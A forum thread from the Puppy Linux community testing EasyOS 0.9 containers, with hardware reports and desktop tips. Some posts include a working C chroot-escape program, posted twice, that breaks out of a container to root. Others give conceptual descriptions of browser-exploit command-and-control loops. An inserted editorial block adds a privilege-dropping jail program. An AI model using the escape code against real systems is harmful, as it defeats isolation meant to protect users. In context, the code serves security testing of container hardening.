EasyOS version 2.3.2, June 22, 2020

For talk and support relating specifically to Puppy derivatives
rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#621 Post by rufwoof »

BarryK wrote:
belham2 wrote:Hi all,

Speaking of Seamonkey and browsers, has anyone gotten ANY other browser to work properly in a Container? I've tried Palemoon, Firefox, Chromium and Chrome, and not one of them will run properly in a Container. They'll run as user and/or as root (depending on browser), but not in a Container for any of them.

I mentioned this problem back in Easy 0.6, and I still cannot lick it. Is it because I run Easy as a "frugal-install"? I mean, the browsers would work in a Container if I did a "full" install to a USB and/or SD Card??

Anyway, in "frugal" mode, no matter how many times I install a browser, then use Easy to set the Container up, which it says it does, that browser is NOT running in a Container.

Wish I could figure it out... :(
I have written that one into my to-do list!

There was a problem reported earlier, that if you install a package, say a PET, it will not run in a container.
Only those apps that are builtin to the q.sfs will run in a container.

I plan to fix this in the next release.

A container is a simple aufs layered filesystem, with q.sfs on the bottom, and a read-write layer, just a folder, on the top layer.
Hence, the only apps available to run are those in the q.sfs.

There are various possible ways to fix this. The one I am thinking of using, is to convert the installed package, say firefox, into a SFS file, say firefox.sfs, and inserting that as a middle layer in the container.

This can be done automatically when the container is created.

0.9 - I opened up the container version of console that's on the desktop by default, ran sakura terminal and changed the font size by right clicking the window so I had a better sized view, ran ppm and updated that, then searched for firefox and installed that via ppm, ran firefox & from the sakura terminal window and I'm running firefox now as I post this. An old version, Firefox ESR 45.9, but definitely working inside a container for me. Just to be sure I was actually running inside the container I opened the normal desktop console and ran which firefox and that came back empty.

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#622 Post by rufwoof »

Inside a container terminal session I tried mounting an HDD ... denied despite being root. Also tried busybox mount and that failed as well. gparted however worked and I could change the first partition's label from within the container, and just to be sure I changed it back again using the standard (non-container) gparted.

Presumably the mount request blocks are just software-based barriers; copying across an alternative, for instance, would I guess circumvent those barriers.

Billtoo
Posts: 3720
Joined: Tue 07 Apr 2009, 13:47
Location: Ontario Canada

EasyOS Pyro64 0.9 (April 15), Xerus64 0.6.8 (Jan. 4), 2018

#623 Post by Billtoo »

Easy Pyro64 0.9 with the radeon driver does a better job (no
tearing,flicker,etc) of streaming video than Xubuntu 18.04 Beta2 does
(so far).
Screenshot shows hd mp4 player on the left screen and a streaming CBC
TV program (in Palemoon) on the right screen, both are playing sound.

video-info-glx 1.5.3 Tue 17 Apr 2018 on Easy Pyro64 0.9 Linux 4.14.32 x86_64
0.0 VGA compatible controller: Advanced Micro Devices,
Inc. [AMD/ATI] Redwood PRO [Radeon HD 5550/5570/5630/6510/6610/7570]
oem: ATI ATOMBIOS
product: REDWOOD 01.00

X Server: Xorg Driver: radeon
X.Org version: 1.19.1
dimensions: 3840x1080 pixels (1013x285 millimeters)
depth of root window: 24 planes

direct rendering: Yes
server glx vendor string: SGI
server glx version string: 1.4
OpenGL vendor string: X.Org
OpenGL renderer string: Gallium 0.4 on AMD REDWOOD (DRM 2.50.0 / 4.14.32, LLVM 3.9.1)
OpenGL version string: 2.1 Mesa 17.0.7

Thanks.
Attachments
Streamingvideo.jpg
(77.01 KiB) Downloaded 609 times

tigs
Posts: 39
Joined: Tue 05 Nov 2013, 23:47

#624 Post by tigs »

My "C" (Windows 10) drive is a NVMe drive; is there any way to carve a part out of that to install Easy? Right now, I can't write a partition on the NVMe. Even if I can, I wonder whether that will work as a data drive.

Thanks for the suggestion re booting the SD with a reader. I don't like to have something dangling or protruding out of my laptop. I just wanted to utilise the slot. My laptop has 3 internal drives already, 2 NVMes and 1 data. I am currently using the data drive to boot Easy. It is working well. I just don't know how to get it to work with the NVMe drive.

PS: Once I created the two partitions following Barry's instruction, the C drive will become un-bootable.
Last edited by tigs on Wed 18 Apr 2018, 01:22, edited 1 time in total.

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#625 Post by rufwoof »

Hi Barry

0.9 sfs download of devx sfs attempt resulted in a really ... really wide message saying no-can-do due to insufficient space (it said something to the effect that the file was 300MB or so whereas free space was "only" 600MB, so it correctly identified that there was sufficient space, but just didn't want to download it).

That aside, I downloaded the devx sfs and set bootloader to load it and then compiled the following exit-chroot

Code:

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

/* Classic chroot escape: only works while the process is root
 * (CAP_SYS_CHROOT) inside the jail. */
int main(void) {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);               /* a subdirectory to chroot into */
    dir_fd = open(".", O_RDONLY);     /* keep an fd to the current directory */
    chroot(".42");                    /* new root is below us; the cwd fd now points outside it */
    fchdir(dir_fd);                   /* move cwd back outside the new root */
    close(dir_fd);
    for (x = 0; x < 1000; x++) chdir("..");  /* climb to the real filesystem root */
    chroot(".");                      /* make the real root the root again */
    return execl("/bin/sh", "sh", "-i", (char *)NULL);  /* argv[0] is the program name, then -i */
}
Compiled it, set the permission to executable, and when run inside a container it results in an exit out of the chroot to the 'standard/normal' level (all system-wide files/folders available, with root permission to access them).

Pyro 0.9 amd executable attached (actual .gz file, so unzip it first).

EDIT : see also http://murga-linux.com/puppy/viewtopic. ... 58#1003058
Attachments
exit-chroot.gz
(3.94 KiB) Downloaded 154 times
Last edited by rufwoof on Mon 27 Aug 2018, 21:12, edited 1 time in total.

stemsee

#626 Post by stemsee »

It is working well on my Atom cherrytrail tablet. Bluetooth connected to my headphones first attempt ... however the same headphone was listed/found a dozen times and counting ...seems to be in a non-excluding loop.

Is there a script to upgrade the kernel? I did it manually to 4.16.1, by unsquashing q.sfs and adding flat contents of kernel-modules.sfs ... is there a technical reason they are not in initrd.q?

Touchscreen is working well, but no right click yet.

Keeps locking up on my 5 series i7 Lenovo laptop with 16GB RAM. Could be the USB 2 dongle it boots from. Further tests required.

But the prospect of roll back and forward, easy share and overlayfs or aufs, outweighs teething problems.

The tutorial blogs are a great help, and easy read. Would make a nice eBook.

First install to a usb 2 stick was using dd, then installed to a populated usb 3 stick manually. Both work fine, booting in legacy mode.

Restarting X takes longer than I am used to.

cheers!

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#627 Post by rufwoof »

BarryK wrote:There was a problem reported earlier, that if you install a package, say a PET, it will not run in a container.
Only those apps that are builtin to the q.sfs will run in a container.

I plan to fix this in the next release.

A container is a simple aufs layered filesystem, with q.sfs on the bottom, and a read-write layer, just a folder, on the top layer.
Hence, the only apps available to run are those in the q.sfs.

There are various possible ways to fix this. The one I am thinking of using, is to convert the installed package, say firefox, into a SFS file, say firefox.sfs, and inserting that as a middle layer in the container.

This can be done automatically when the container is created.
That does seem to be the obvious way to go, perhaps along with not deprecating spot but instead including an option to chroot using a setuid of spot into the container. That way the user would have to 'request' root to add programs to the container (i.e. outside of the container root finds/builds/adds a sfs) and the user would be locked in (as running as spot) to the standard file permissions and other restrictions (wouldn't for instance be able to exit-chroot or change /etc/hosts ...etc.). Similarly if a browser breakout did occur inside a container, i.e. a remote hacker in effect had a cli prompt running on the inside (behind the firewall) that was sending out requests asking for which command(s) to run next, then that would be contained to just the container (even more so if su or any other root access were prohibited inside containers that had been initiated with setuid spot).

The Dogs have apt2sfs type scripts that download packages and produce a sfs. Chroot with setuid is also relatively straight forward. Simplest solution IMO.

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

#628 Post by BarryK »

rufwoof wrote:0.9 - I opened up the container version of console that's on the desktop by default, ran sakura terminal and changed the font size by right clicking the window so I had a better sized view, ran ppm and updated that, then searched for firefox and installed that via ppm, ran firefox & from the sakura terminal window and I'm running firefox now as I post this. A old version Firefox ESR 45.9, but definitely working inside a container for me. Just to be sure I was actually running inside the container I opened the normal desktop console and ran which firefox and that came back empty.
That's great! :D

I'm wondering about the possibilities of the console-in-a-container, and it is good that you are exploring it.
https://bkhome.org/news/

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

#629 Post by BarryK »

tigs wrote:My "C" (windows 10) drive is a NVMe drive, any way carv a part out of that to install easy? Right now, I can't write partition on the NVMe. Even if I can, I wonder whether that will work as a data drive.

Thanks for suggestion re booting the SD with a reader. I don't like to have someting dangling or protruding out of my laptop. I just wanted to utilized the slot. My laptop has 3 internal drives already, 2 nvmes and 1 data. I am currently using the data to boot the easy. It is working well. I just don't know how to get it to work with the nvme drive.

PS: Once I created the two partitions following Barry's instruction, the C drive will become un-bootable.
Good that you have a NVMe drive!

Well, good for testing anyway. Booted Easy from usb/sdcard, do the NVMe partitions show up as icons on the desktop?

If so, are you able to mount them?

If you type "probepart -m" in a terminal, do the NVMe partitions show as expected? It would be good to post the output here for us to see.
https://bkhome.org/news/

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

#630 Post by BarryK »

rufwoof wrote:Hi Barry

0.9 sfs download of devx sfs attempt resulted in a really ... really wide message saying no-can-do due to insufficient space (it said something to the effect that the file was 300MB or so whereas free space was "only" 600MB, so it correctly identified that there was sufficient space, but just didn't want to download it).

That aside, I downloaded the devx sfs and set bootloader to load it and then compiled the following exit-chroot

Code:

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

/* Classic chroot escape: only works while the process is root
 * (CAP_SYS_CHROOT) inside the jail. */
int main(void) {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);               /* a subdirectory to chroot into */
    dir_fd = open(".", O_RDONLY);     /* keep an fd to the current directory */
    chroot(".42");                    /* new root is below us; the cwd fd now points outside it */
    fchdir(dir_fd);                   /* move cwd back outside the new root */
    close(dir_fd);
    for (x = 0; x < 1000; x++) chdir("..");  /* climb to the real filesystem root */
    chroot(".");                      /* make the real root the root again */
    return execl("/bin/sh", "sh", "-i", (char *)NULL);  /* argv[0] is the program name, then -i */
}
Compiled it, set the permission to executable, and when run inside a container it results in an exit out of the chroot to the 'standard/normal' level (all system-wide files/folders available, with root permission to access them).

Pyro 0.9 amd executable attached (actual .gz file, so unzip it first).
Yeah. There are many other security settings for a container; I only ticked a couple of them. I need to revisit this area.

If you are running, say, Firefox, in a container, I don't know how the existence of a utility such as exit-chroot can be used.

The risk is from someone remote. Say sshd is running in a container, remote person logs in, I would think that anything that breaks out of the container would also kill the sshd session.

There is another thing to think about. I have considered another level of security. There is another pre-created container named 'ssh0', that is used by EasyShare.

For file transfers with EasyShare, using sshfs, not using Samba, the ssh login chroots into the container, as user "rover". rover has hardly any rights.

I did mention rover here:

http://bkhome.org/easyshare/easyshare-s ... aring.html

Something to think about, rover could be setup as default on all containers.
https://bkhome.org/news/

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#631 Post by rufwoof »

BarryK wrote:If you are running, say, Firefox, in a container, I don't know how the existence of a utility such as exit-chroot can be used.
Older browsers have their vulnerabilities published along with descriptions of the fixes. Some of those include code execution vulnerabilities ... so a hacker knows where to focus their efforts to potentially exploit anyone who is running an older/unpatched browser. Outbound internet traffic is rarely monitored, as are the returns from those outbound requests, so if a breach can install into memory even a small module that simply loops send-requests to the hacker's IP and executes whatever command is returned, the hacker has in effect bypassed the firewall. Something like exit-chroot is just one of the things that might be tried, along with a barrage of others such as scanning around the LAN to see what other devices/systems might be available to have persistent code installed. Imagine a browser flaw that enabled installation into memory of a wget file from the hacker's site, executing that file in the background ... a looping-type script sending the standard and error outputs out as further http requests ...

I strive to change my user-agent, as revealing your browser version and operating system is a great aid towards targeted exploits. Faking your user-agent can vastly reduce the chances of an initial penetration (wrong exploits/code that won't work thrown at you). Only running root at the console (not under X) is yet another risk reduction choice. The entire 'nix file structure and permissions are geared with security utmost in mind. As are other barriers such as W^X (write exclusive-or execute, i.e. memory space restricted to being write only or execute only, not both), randomisation (so the structure of memory space changes rather than following a consistent pattern), pledge (applications assigned sets of things that they are permitted to do, but prevented from accessing commands/files outside of that) ...etc.

Security isn't just your data/PC, but anyone and anything else sharing the same LAN.

belham2
Posts: 1715
Joined: Mon 15 Aug 2016, 22:47

#632 Post by belham2 »

rufwoof wrote:
BarryK wrote:If you are running, say, Firefox, in a container, I don't know how the existence of a utility such as exit-chroot can be used.
Older browsers have their vulnerabilities published along with descriptions of the fixes. Some of those include execution of code vulnerabilities ... so a hacker knows where to focus their efforts to potentially exploit anyone who is running a older/unpatched browser......

Security isn't just your data/PC, but anyone and anything else sharing the same LAN.

This confuses me. A lot of us rip samba (or any file sharing service) out of our puppies/ddogs, also erect a firewall that automatically blocks cifs/rpc/rsync/rdp/ssh/telnet/ftp/smtp and (if applicable) NetBIOS, along with a router (and its firewall) that is even more hardened than this.

Thus, in a setup like this, just how, when, where and why would it matter what browser you are running? Any hacker will be stymied at every stop trying to execute anything in memory, coming out of the browser. And if you are 100% in ram, with daily reboots, it's game over for anyone trying to come in through memory (and a browser). Plus, any looping process by a hacker installed memory applet will be hugely noticeable in how the cpu is acting.

Containers (and not just in Barry's Easy) emulate and/or help in this process a lot, so I am stumped here at the reasoning.... :?

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#633 Post by rufwoof »

belham2 wrote:This confuses me. A lot of us rip samba (or any file sharing service) out of our puppies/ddogs, also erect a firewall that automatically blocks cifs/rpc/rsync/rdp/ssh/telnet/ftp/smtp and (if applicable) NetBIOS, along with routers (and its firewall) that is even more hardened than this.
Which blocks inbound. There are no firewalls on outbound. The objective for a hacker is to get that first outbound going, as the system will treat that as an outbound request and allow both that and the returned content/reply through.
belham2 wrote:Thus, in a setup like this, just how, when, where and why would it matter what browser you are running?
Because a 'faulty' browser might enable things to be loaded into memory and in effect the instruction pointer directed to that. If say you visit a malicious web site and view the content, the content of an image file for instance could include instruction code - do something, jump 20 forward for the next instruction and do that instruction, jump 30 forward ... etc. In other words a program that YOU downloaded into memory. Looked at as just an image, that image might look totally normal, or it might not even be seen, just downloaded along with html instructions to size the display of that image to being just one pixel. The tricky part for hackers is getting the instruction pointer to point to the very first instruction of their program; a faulty browser (or other such) exploit opens up the potential for that.
belham2 wrote:Any hacker will be stymied at every stop trying to execute anything in memory, coming out of the browser. And if you are 100% in ram, with daily reboots, it's game over for anyone trying to come in through memory (and a browser).
After initialisation of a program ... a lot can happen very quickly. An open window of even a few seconds can be more than enough time. Having penetrated even most briefly, most hacks will look around for potential means to remain persistent one way or another. Having root/full access to disk/devices etc. makes finding such an option more likely compared to running restricted.
belham2 wrote:Plus, any looping process by a hacker installed memory applet will be hugely noticeable in how the cpu is acting.
Only if the program is permitted to run away wildly; most hackers would consider that and adjust their programs accordingly. We are after all talking in very simplistic terms here, in practice things are way more complex. Big data for instance, where even allowing sites to see what OS, browser, screen resolution ... etc. you are using ... along with other measures can enable you to be individually identified (or at least into a sub-set group of limited numbers).

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#634 Post by rufwoof »

Bug list as usual with Puppy, way way too long.

Jwm and Rox are a great partnership but Puppy destroys that.

One example, add a rox panel to the top of screen and no matter what it will be covered by maximised windows, even if you set rox to leave space for the panel, or other associated settings (remain on top ..etc.).

Desktop drive icons if you set to be further up to allow for a larger tray - reset. Desktop icons, remove them and they reappear (I prefer the convenience of dropping icons into the rox panel so you can drag/drop there instead of having to showdesktop to drag to a desktop icon). Use jwm desk setup to edit jwm and add another jwm tray to the left say (I prefer Dock to be over there and have a bottom panel that auto hides and shows menu and tasklist), and Puppy decides to rearrange all that to how it thinks it should be arranged (that doesn't work). Bloat of all the gui's to tweak this and that simply ruin things. Far better to learn a bit of XML syntax and have just a few links to the relevant files (.jwmrc etc.) in which you can 'code' all of your startup commands and configuration. Usable only if you strip out much of the bloat.

But that's all aside from Pyro 0.9. The only issue I've found so far is that if you move a container to the rox panel and remove the desktop icon, it reappears on the desktop again at the next reboot. But again that's not Pyro but Puppy.

Something odd with seamonkey font size settings. Had super small fonts initially but after playing around with UserChrome.css both in the outside and inside of containers I got that settled.

UTC wasn't set by default, so the first time I set up the clocks in my other boots they were all out by an hour.

Pyro wise I've tried multiple creation/deletions/restores etc. and all seems to work well. I've mostly used terminal containers and just built and run things inside each container, running rox and seamonkey etc. and that's all worked well. Did try running as spot but that didn't work (nobody permissions on the spot folder).

Concept seems to be working well. Particularly like the introduction (simple/third part) text about containers, found the first two technical text documents to be a bit too glazing.

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#635 Post by rufwoof »

A workaround trick with a rox panel having maximised windows covering it is to create a second jwm tray using jwmdesk manager and put that for instance over to the far top right and then create a rox panel of the same height/background colour.

I set the bottom (main panel) to be central and autohide, increasing its height and just left the MENU, showdesktop, tasklist and xload in that tray. The top right tray I set to show the date and dock.

The rox panel (rest of the top of the screen) now remains visible when a window is maximised, and being a rox panel you can drag/drop files onto those icons (or use the middle mouse button to drag/move to rearrange those icons). Adding an icon to the panel is also just drag and drop.
Attachments
s1.png
(198.49 KiB) Downloaded 747 times
s.png
(246.09 KiB) Downloaded 752 times

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#636 Post by rufwoof »

This looks interesting xchroot http://www.elstel.org/xchroot/, saves on trying to get xhost localhost:0 type X redirections going between the standard pyro and the container

I changed the spot password to one I'd know

passwd spot
spot
spot

I edited /usr/sbin/chroot so as to use xchroot instead of busybox chroot

and then created a sakura container

ec-chroot sakura

... which xchroot'd into a sakura session ... as root.

I then created a simple script ....

#!/bin/sh
login
exit

chmod +x that script and ran it. When prompted to login I logged in as spot (using the spot password I had set earlier).

Running leafpad and up popped the x-window for leafpad :)

chroot not allowed. Type exit and the exit after the login command in the above script has it disconnect from the container session.

I've messed around with things so much that my current version of pyro is untidy so I'm going to re dd another fresh copy and see if can repeat the above in the same manner.

Conceptually whilst logged into a cli in the container I should be able to install firefox via PPM and then login as spot and run that ... at least that's my thought-train.
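The following C program is an added example written for this thread; it is not EasyOS code, not rufwoof's ec-chroot setup, and not the behaviour of busybox or xchroot. It shows the other half of the exit-chroot story from #625: the escape works because the process is still root (and so may call chroot()) inside the container, so the cure sketched in #627 and #636 (chroot, then become spot) is to chroot, chdir into the new root, and drop privileges irreversibly before exec'ing the shell. The container path in the usage comment, the uid/gid values and the program name jail-shell are assumptions; look up spot's real uid/gid in /etc/passwd.

```c
/* jail-shell.c: added example, not part of EasyOS.
 * Usage (assumed path, assumed uid/gid for spot):
 *   ./jail-shell /mnt/wkg/containers/sakura/container 1000 1000
 * Must be started as root; it ends up as an unprivileged shell inside
 * the container root, in which the exit-chroot trick fails with EPERM. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Enter `jail` and make the privilege drop irreversible:
 * 1. chroot(jail), then chdir("/") so the cwd is inside the new root
 *    (exit-chroot depends on a cwd fd that still points outside it);
 * 2. setgroups() to clear supplementary groups, then setgid(), then
 *    setuid() last, since after setuid() the others would fail.
 * Returns 0 on success, -1 with errno set on failure. If the chroot
 * itself fails nothing about the process has changed. */
int enter_jail(const char *jail, uid_t uid, gid_t gid) {
    if (chroot(jail) != 0) return -1;
    if (chdir("/") != 0) return -1;
    if (setgroups(0, NULL) != 0) return -1;
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;
    return 0;
}

/* 1 if the process runs as `expected` (real and effective uid) and can
 * no longer regain root via setuid(0), which would succeed if the saved
 * set-user-ID were still 0. Only the uid state is checked; capabilities
 * granted by other means (file caps, ambient caps) are not. */
int privileges_irrevocable(uid_t expected) {
    if (getuid() != expected || geteuid() != expected) return 0;
    if (setuid(0) == 0) return 0;        /* root came back: drop was incomplete */
    return errno == EPERM;
}

int main(int argc, char **argv) {
    if (argc < 4) {
        fprintf(stderr, "usage: %s JAIL UID GID [cmd args...]\n", argv[0]);
        return 2;
    }
    uid_t uid = (uid_t)strtoul(argv[2], NULL, 10);
    gid_t gid = (gid_t)strtoul(argv[3], NULL, 10);
    if (enter_jail(argv[1], uid, gid) != 0) {
        perror("enter_jail");
        return 1;
    }
    if (!privileges_irrevocable(uid)) {
        fprintf(stderr, "refusing to continue: privileges not fully dropped\n");
        return 1;
    }
    /* Run the requested command, else an interactive shell (argv[0] = "sh"). */
    if (argc > 4) execv(argv[4], argv + 4);
    else execl("/bin/sh", "sh", "-i", (char *)NULL);
    perror("exec");
    return 1;
}
```

The order matters: dropping uid before chroot() would make the chroot fail, and chrooting without chdir("/") leaves the cwd outside the jail, which is exactly the handle exit-chroot uses. Run as a non-root user the program fails at chroot() with EPERM, which is the same failure the exit-chroot binary hits once privileges are gone.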

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#637 Post by rufwoof »

ssh/ssh-gui not X forwarding

I have a BSD server behind my main Virgin Hub (ISP provider's router) that serves as my server. I also have netsurf installed on that headless system. Another router's WAN connects to that Virgin Hub's LAN and all other PCs/systems connect to that second router, i.e. LAN isolation.

More usually I ssh -XC user@192.168.1.x from one of the 10.0.0.x PCs that are behind the second router and then run netsurf and X is forwarded correctly, i.e. a browser window is shown. echo $DISPLAY from the ssh cli typically shows localhost:10 or whatever. However using Pyro, both ssh and ssh-gui with the X forward option selected show an empty $DISPLAY, so running anything X over ssh doesn't work (xcalc, xedit, netsurf ..etc. for instance just show cannot open display).

Yes, I did try turning off the firewall etc. And to confirm, I did manage to ssh X using Lucid 525 (which I used to post this).
Attachments
s.jpg
(101.88 KiB) Downloaded 670 times

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

#638 Post by BarryK »

rufwoof wrote:I've messed around with things so much that my current version of pyro is untidy so I'm going to re dd another fresh copy and see if can repeat the above in the same manner.
One thing that needs to be improved, is the reFind boot menu, for UEFI-firmware PCs.

You have to press the F2 key to bring up a submenu, and then there is the option to "rollback".

Firstly, the sub-menu is not obvious, and I should really see if those items can be placed on the main menu.

Secondly, "rollback" actually wipes the read-write layer entirely (the .session folder), going back to a pristine first-bootup situation.
The description in the menu doesn't really state that.

Anyway, you could use that option to wipe everything, without having to do another install.

But it doesn't remove the containers, you would have to use the Container Manager to delete them.
https://bkhome.org/news/

BarryK
Puppy Master
Posts: 9392
Joined: Mon 09 May 2005, 09:23
Location: Perth, Western Australia
Contact:

#639 Post by BarryK »

Guys,
I am not being very responsive to feedback right now, will get onto it soon.

Currently working on getting many old "puppy apps" to compile with aarch64 (64-bit arm) on my fork of OpenEmbedded.

Blog post:
http://bkhome.org/news/201804/first-oe- ... dates.html

Was very pleased this morning, when got 'gwhere' to compile. This is a very old gtk2 app, that has been in the pups from the early days, and I still have it in Easy/Quirky -- though, have no idea if anyone uses it!

Unfortunately, might have to retire inkscapelite. I got it to compile, for aarch64 in OE, and x86_64 in Easy -- but in latter case it crashed at startup.
The binary compile for April Quirky, in T2, still works.
Could trace it at startup, but more inclined to let it RIP.

What got me thinking about aarch64, is Google announced that Android will be all-64-bit by 2020, or something like that.
https://bkhome.org/news/

stemsee

#640 Post by stemsee »

I have just used EasyShare to connect on a public encrypted AP with my HP cherrytrail tablet and Panasonic Lumix FZ82 (4k bridge camera) to transfer files from camera to Easy-OS. Only one problem encountered - in the samba setup gui it does not mention that username must be specified from the other end, which is 'root'. Then connected and sent from the camera to the shared folder/directory. Great! Next time I will try direct connection and report.
